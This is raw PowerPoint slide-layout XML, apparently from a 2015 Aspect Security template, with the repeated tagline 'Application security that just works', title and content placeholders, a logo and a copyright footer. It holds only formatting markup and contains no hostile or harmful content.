          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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2_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1" descr="AS-powerpoint_background-interior.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546"/>
            <a:ext cx="9144000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="682625" y="1431959"/>
            <a:ext cx="7627560" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="69850">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7" name="Text Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="685800"/>
            <a:ext cx="7626096" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="1" kern="1200" cap="all" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1837944"/>
            <a:ext cx="7626096" cy="4096512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="6350" indent="-6350">
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char=" "/>
              <a:defRPr lang="en-US" sz="3000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="855663" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr lang="en-US" sz="2400" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:buChar char="‒"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="174689"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="›"/>
              <a:defRPr/>
            </a:lvl4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8" name="Picture 7" descr="Aspect-Security-logo.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658012" y="294400"/>
            <a:ext cx="1670324" cy="417582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6576113"/>
            <a:ext cx="2895600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>©2015 Aspect Security. All Rights Reserved</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6219303" y="6589205"/>
            <a:ext cx="2133600" cy="226714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{47FC5512-09DD-2347-8DA7-742028CF8D8D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1867027604"/>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3_Title and Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5773911" y="295363"/>
            <a:ext cx="3178807" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Application security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="1" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>that just works</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
